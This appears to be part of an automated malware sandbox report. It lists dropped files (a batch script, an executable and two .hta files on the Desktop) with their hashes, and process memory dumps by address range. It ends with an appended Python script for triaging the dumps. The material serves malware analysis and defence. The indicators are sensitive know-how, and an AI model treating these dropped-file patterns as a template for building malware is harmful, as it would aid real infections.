                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng\GrShaderCache\data_0

                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                            MD5

                                                                                                                                            cf89d16bb9107c631daabf0c0ee58efb

                                                                                                                                            SHA1

                                                                                                                                            3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

                                                                                                                                            SHA256

                                                                                                                                            d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

                                                                                                                                            SHA512

                                                                                                                                            8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng\GrShaderCache\data_1

                                                                                                                                            Filesize

                                                                                                                                            264KB

                                                                                                                                            MD5

                                                                                                                                            d0d388f3865d0523e451d6ba0be34cc4

                                                                                                                                            SHA1

                                                                                                                                            8571c6a52aacc2747c048e3419e5657b74612995

                                                                                                                                            SHA256

                                                                                                                                            902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

                                                                                                                                            SHA512

                                                                                                                                            376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng\GrShaderCache\data_2

                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                            MD5

                                                                                                                                            0962291d6d367570bee5454721c17e11

                                                                                                                                            SHA1

                                                                                                                                            59d10a893ef321a706a9255176761366115bedcb

                                                                                                                                            SHA256

                                                                                                                                            ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

                                                                                                                                            SHA512

                                                                                                                                            f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng\GrShaderCache\data_3

                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                            MD5

                                                                                                                                            41876349cb12d6db992f1309f22df3f0

                                                                                                                                            SHA1

                                                                                                                                            5cf26b3420fc0302cd0a71e8d029739b8765be27

                                                                                                                                            SHA256

                                                                                                                                            e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

                                                                                                                                            SHA512

                                                                                                                                            e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\y2surjz.bat

                                                                                                                                            Filesize

                                                                                                                                            10KB

                                                                                                                                            MD5

                                                                                                                                            f06b802a647d148b7104e382dc0b7ed8

                                                                                                                                            SHA1

                                                                                                                                            89f996877614a66ba7c22723474ea53b0e2fdf6f

                                                                                                                                            SHA256

                                                                                                                                            c4b0e7467d03ab117a70eb53478ad27f4e3795678519ebf352d1550a9cb12d1d

                                                                                                                                            SHA512

                                                                                                                                            da37ccb003e169b85117024d45cce61ecd25fab34fd79487b2933e5d7cddc3481c6184534a0bcd2d42c420d32384c3f75e422d5a92dfd4dce3dd4092306a0710

                                                                                                                                          • C:\Users\Admin\AppData\RoamingBQCIJETUWMBNKI184FGZ9UFDLYLKWLVH.EXE

                                                                                                                                            Filesize

                                                                                                                                            416KB

                                                                                                                                            MD5

                                                                                                                                            7b8c43ff5287ec4c86921c06bff22ff0

                                                                                                                                            SHA1

                                                                                                                                            fb00fdb9cd78f260f5f26fc01aee6bb209d05877

                                                                                                                                            SHA256

                                                                                                                                            ed0b15b82c2dba6a4516c5a0f5268a95fd7fe8aead707272a096d8ef47db92c0

                                                                                                                                            SHA512

                                                                                                                                            dc914c0aa19df91665c5ad0020bfe87bcb7e97126446d4497b6ca8388f1e040796129c66effeeee78073d4f4f3e96d3446652c7510806bb6ac6cc652f4774784

                                                                                                                                          • C:\Users\Admin\Desktop\hYoO4p70j.hta

                                                                                                                                            Filesize

                                                                                                                                            735B

                                                                                                                                            MD5

                                                                                                                                            92058297691539d6d72c35df87f9aae7

                                                                                                                                            SHA1

                                                                                                                                            a8c0b9e4d5424a400391e915913f8b3fa3e4bf39

                                                                                                                                            SHA256

                                                                                                                                            897a4c11bd857138eec4a35edb2fe110052f2cd73bad1c301a5e3857069615f5

                                                                                                                                            SHA512

                                                                                                                                            7dc9cff8a7aa9439c2869451eed329fa4ebf8367bee464c22b7abfeed425bfad2cedcb7572db01c1b89d2cb6706abe0da853bff26df3d7f4151a417434df5ff9

                                                                                                                                          • C:\Users\Admin\Desktop\m1XO5qjHr.hta

                                                                                                                                            Filesize

                                                                                                                                            735B

                                                                                                                                            MD5

                                                                                                                                            19ef055e872ee2b361ba2b5e7dcab491

                                                                                                                                            SHA1

                                                                                                                                            0833ff213a8b27ce1877760ff670ea7aa7af832c

                                                                                                                                            SHA256

                                                                                                                                            4a36e80fc21be82ba6c5fda0d02b2f174c8aae2e5df3fd3db11b249da66d9bda

                                                                                                                                            SHA512

                                                                                                                                            3b3180f85947583f089644810b3f724396cecdcfdbb428c8381a82bbe608b0ff325c1fca9ee81c1b1352567380f188c2ba3048eddd38a227686f99ba5d73689e

                                                                                                                                          • memory/428-1405-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/536-2747-0x00007FF799960000-0x00007FF799D90000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4.2MB

                                                                                                                                          • memory/548-2377-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/552-471-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/1124-1027-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/1172-2935-0x0000022A2F760000-0x0000022A2F942000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            1.9MB

                                                                                                                                          • memory/1456-1243-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/1544-1675-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/1576-414-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/1592-1999-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/1732-919-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/1736-1945-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/1796-357-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/2012-1567-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/2132-2323-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/2272-2720-0x000002AE532A0000-0x000002AE532C2000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            136KB

                                                                                                                                          • memory/2284-2609-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.5MB

                                                                                                                                          • memory/2284-2612-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.5MB

                                                                                                                                          • memory/2284-2617-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.5MB

                                                                                                                                          • memory/2284-2614-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.5MB

                                                                                                                                          • memory/2284-2616-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.5MB

                                                                                                                                          • memory/2284-2615-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.5MB

                                                                                                                                          • memory/2284-2613-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.5MB

                                                                                                                                          • memory/2284-2618-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.5MB

                                                                                                                                          • memory/2284-2611-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.5MB

                                                                                                                                          • memory/2284-2607-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.5MB

                                                                                                                                          • memory/2284-2624-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.5MB

                                                                                                                                          • memory/2284-2610-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.5MB

                                                                                                                                          • memory/2284-2619-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.5MB

                                                                                                                                          • memory/2284-2608-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.5MB

                                                                                                                                          • memory/2600-2269-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/2784-2661-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.5MB

                                                                                                                                          • memory/2900-811-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/3132-2215-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/3176-973-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/3244-300-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/3272-2485-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/3528-2107-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/3536-1189-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/3568-2053-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/3584-1513-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/3904-528-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/4324-1135-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/4328-1621-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/4352-1297-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/4508-2431-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/4516-2781-0x0000000006210000-0x00000000062A2000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            584KB

                                                                                                                                          • memory/4516-2768-0x0000000005A10000-0x0000000005BF2000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            1.9MB

                                                                                                                                          • memory/4516-2783-0x0000000006E80000-0x0000000006ED0000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            320KB

                                                                                                                                          • memory/4516-2766-0x0000000000400000-0x0000000000490000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            576KB

                                                                                                                                          • memory/4516-2782-0x0000000006E10000-0x0000000006E22000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            72KB

                                                                                                                                          • memory/4516-2767-0x00000000052F0000-0x0000000005434000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            1.3MB

                                                                                                                                          • memory/4524-2575-0x0000000000FC0000-0x0000000001473000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4.7MB

                                                                                                                                          • memory/4524-2566-0x0000000000FC0000-0x0000000001473000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4.7MB

                                                                                                                                          • memory/4556-585-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/4676-1837-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/4720-159-0x0000017B88790000-0x0000017B888E6000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            1.3MB

                                                                                                                                          • memory/4720-160-0x0000017BA2D80000-0x0000017BA2ED8000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            1.3MB

                                                                                                                                          • memory/4876-243-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/5044-2161-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/5088-1459-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/5164-1081-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/5196-162-0x0000027931260000-0x000002793126A000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            40KB

                                                                                                                                          • memory/5196-164-0x0000027931300000-0x0000027931312000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            72KB

                                                                                                                                          • memory/5208-2539-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/5264-1783-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/5372-756-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/5376-699-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/5696-1729-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/5712-642-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/5856-3149-0x000001F329600000-0x000001F3297E2000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            1.9MB

                                                                                                                                          • memory/5900-865-0x0000000000400000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.9MB

                                                                                                                                          • memory/5936-3145-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            380KB

                                                                                                                                          • memory/5960-141-0x0000000006C10000-0x0000000006C5C000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            304KB

                                                                                                                                          • memory/5960-139-0x00000000062E0000-0x0000000006634000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.3MB

                                                                                                                                          • memory/5976-23-0x0000000007EE0000-0x0000000007F76000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            600KB

                                                                                                                                          • memory/5976-17-0x0000000006490000-0x00000000067E4000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.3MB

                                                                                                                                          • memory/5976-25-0x0000000008CF0000-0x0000000009294000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            5.6MB

                                                                                                                                          • memory/5976-24-0x0000000007E70000-0x0000000007E92000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            136KB

                                                                                                                                          • memory/5976-3-0x00000000053D0000-0x0000000005406000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            216KB

                                                                                                                                          • memory/5976-21-0x0000000006EC0000-0x0000000006EDA000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            104KB

                                                                                                                                          • memory/5976-20-0x00000000080C0000-0x000000000873A000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            6.5MB

                                                                                                                                          • memory/5976-19-0x00000000069C0000-0x0000000006A0C000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            304KB

                                                                                                                                          • memory/5976-18-0x0000000006980000-0x000000000699E000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            120KB

• memory/5976-4-0x0000000005B80000-0x00000000061A8000-memory.dmp
  Filesize: 6.2MB

• memory/5976-5-0x00000000059E0000-0x0000000005A02000-memory.dmp
  Filesize: 136KB

• memory/5976-6-0x00000000062B0000-0x0000000006316000-memory.dmp
  Filesize: 408KB

• memory/5976-7-0x0000000006320000-0x0000000006386000-memory.dmp
  Filesize: 408KB

• memory/5984-1351-0x0000000000400000-0x00000000006DC000-memory.dmp
  Filesize: 2.9MB

• memory/6068-1891-0x0000000000400000-0x00000000006DC000-memory.dmp
  Filesize: 2.9MB

• memory/6072-2677-0x0000000140000000-0x00000001400CE000-memory.dmp
  Filesize: 824KB

• memory/6072-2678-0x0000000140000000-0x00000001400CE000-memory.dmp
  Filesize: 824KB
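The dump names above encode the process ID, a dump index and the virtual address range that was captured. A quick triage script for such a list, added here as an example (it is not part of the sandbox report or its tooling): it parses the names, checks that each address range is consistent with the reported file size, flags regions that start at the linker's default PE image bases (0x400000 for x86, 0x140000000 for x64), which in a packed sample is where the unpacked payload usually lives, and points out ranges that were dumped more than once so the two captures can be diffed. The naming scheme, the size rounding and the image-base heuristic are assumptions inferred from the entries shown, not documented behaviour of the sandbox.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample input: the dump file names and reported sizes copied from
# the memory-dump list of this sandbox report (not live data from the sandbox).
SAMPLE_DUMPS: List[Tuple[str, str]] = [
    ("memory/5976-4-0x0000000005B80000-0x00000000061A8000-memory.dmp", "6.2MB"),
    ("memory/5976-5-0x00000000059E0000-0x0000000005A02000-memory.dmp", "136KB"),
    ("memory/5976-6-0x00000000062B0000-0x0000000006316000-memory.dmp", "408KB"),
    ("memory/5976-7-0x0000000006320000-0x0000000006386000-memory.dmp", "408KB"),
    ("memory/5984-1351-0x0000000000400000-0x00000000006DC000-memory.dmp", "2.9MB"),
    ("memory/6068-1891-0x0000000000400000-0x00000000006DC000-memory.dmp", "2.9MB"),
    ("memory/6072-2677-0x0000000140000000-0x00000001400CE000-memory.dmp", "824KB"),
    ("memory/6072-2678-0x0000000140000000-0x00000001400CE000-memory.dmp", "824KB"),
]

# Assumed naming scheme: memory/<pid>-<dump index>-<start VA>-<end VA>-memory.dmp
DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)

# Default image bases the MSVC linker assigns to EXEs. A dumped region that
# starts exactly there is usually a mapped PE image, the first place to look
# for an unpacked payload in a packed sample (heuristic, not a guarantee).
DEFAULT_IMAGE_BASES: Dict[int, str] = {
    0x400000: "x86 default PE image base",
    0x140000000: "x64 default PE image base",
}


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    index: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def parse_dump_name(name: str) -> DumpRegion:
    """Split a dump file name into pid, index and the captured address range."""
    m = DUMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a sandbox memory dump name: {name!r}")
    return DumpRegion(int(m["pid"]), int(m["idx"]), int(m["start"], 16), int(m["end"], 16))


def human_size(nbytes: int) -> str:
    # Assumed rounding that reproduces the sizes shown in the report:
    # whole KiB below 1 MiB, one decimal of MiB at or above it.
    if nbytes < 1024 * 1024:
        return f"{nbytes // 1024}KB"
    return f"{nbytes / (1024 * 1024):.1f}MB"


def check_region(name: str, reported_size: str) -> dict:
    """Compare the address range with the reported size and note PE-base hits."""
    region = parse_dump_name(name)
    hint: Optional[str] = DEFAULT_IMAGE_BASES.get(region.start)
    return {
        "pid": region.pid,
        "index": region.index,
        "start": region.start,
        "size": region.size,
        "size_matches": human_size(region.size) == reported_size,
        "image_base_hint": hint,
    }


def triage(dumps: List[Tuple[str, str]]) -> List[dict]:
    return [check_region(name, size) for name, size in dumps]


def duplicate_ranges(dumps: List[Tuple[str, str]]) -> List[Tuple[int, int, int]]:
    """Same (pid, start, end) dumped more than once: the sandbox captured that
    region at two points in time, so the two files are worth diffing."""
    seen: Dict[Tuple[int, int, int], List[int]] = {}
    for name, _ in dumps:
        r = parse_dump_name(name)
        seen.setdefault((r.pid, r.start, r.end), []).append(r.index)
    return sorted(key for key, idxs in seen.items() if len(idxs) > 1)


if __name__ == "__main__":
    for row in triage(SAMPLE_DUMPS):
        hint = row["image_base_hint"] or "-"
        print(f"pid {row['pid']:>5} #{row['index']:<5} 0x{row['start']:X} "
              f"{row['size']:>8} bytes  size_ok={row['size_matches']}  {hint}")
    dups = duplicate_ranges(SAMPLE_DUMPS)
    print("dumped twice:", [f"pid {p} 0x{s:X}-0x{e:X}" for p, s, e in dups])
```

On this report's list every range agrees with its reported size; the two 2.9MB regions at 0x400000 (PIDs 5984 and 6068) and the 824KB region at 0x140000000 (PID 6072, dumped twice) are the candidates to carve and inspect for a PE header before anything else.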
